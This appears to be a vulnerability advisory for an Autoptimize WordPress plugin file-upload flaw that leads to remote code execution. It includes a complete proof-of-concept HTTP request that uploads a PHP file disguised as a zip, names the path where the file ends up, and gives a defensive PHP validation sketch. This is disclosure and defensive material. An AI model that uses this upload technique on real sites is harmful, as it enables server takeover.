The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high-privilege users to upload arbitrary files, such as PHP files, leading to RCE.
https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip

<?php phpinfo() ?>
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"

6df2d6b321
-----------------------------161325441624547204062709166080--
Even if the request generates a 500 error (for example, when PHP ZipArchive is not installed), the file will be at /wp-content/uploads/ao_ccss/rce.php
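
The missing check, sketched as an added example (not Autoptimize's code and not the vendor's fix): the upload is validated while it is still in PHP's temporary location, so nothing is stored under a web-served directory unless it is a real Zip archive. The function name example_validate_import_zip and the entry-name rules are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not part of the plugin.
// Call it on $_FILES['file']['tmp_name'] BEFORE moving the upload anywhere.
function example_validate_import_zip(string $tmp_path, string $client_name): bool
{
    // The client-supplied filename and Content-Type are untrusted: the request
    // above labels the part application/zip but sends PHP source as rce.php.
    if (strtolower(pathinfo($client_name, PATHINFO_EXTENSION)) !== 'zip') {
        return false;
    }
    // A Zip archive starts with "PK\x03\x04" ("PK\x05\x06" when it is empty).
    $magic = (string) file_get_contents($tmp_path, false, null, 0, 4);
    if ($magic !== "PK\x03\x04" && $magic !== "PK\x05\x06") {
        return false;
    }
    // Fail closed when ZipArchive is missing, rather than raising an error
    // after the file has already been written to the uploads directory.
    if (!class_exists('ZipArchive')) {
        return false;
    }
    $zip = new ZipArchive();
    if ($zip->open($tmp_path, ZipArchive::CHECKCONS) !== true) {
        return false;
    }
    // Assumed rule set: no entry may leave the target directory or unpack as
    // a server-side script. An allowlist of expected entry names is stricter.
    $ok = true;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === false || $name === '' || strpos($name, '..') !== false
            || strpos($name, '/') === 0
            || preg_match('/\.(php\d?|phtml|phar)$/i', $name)) {
            $ok = false;
            break;
        }
    }
    $zip->close();
    return $ok;
}

// Constructed sample: the file part from the request above, saved to a temp file.
$tmp = tempnam(sys_get_temp_dir(), 'ccss');
file_put_contents($tmp, '<?php phpinfo() ?>');
var_dump(example_validate_import_zip($tmp, 'rce.php'));
unlink($tmp);
```

Only a file that passes this check should be moved out of the temporary location, and the ao_ccss uploads directory can additionally be configured at the web server so that scripts in it are never executed.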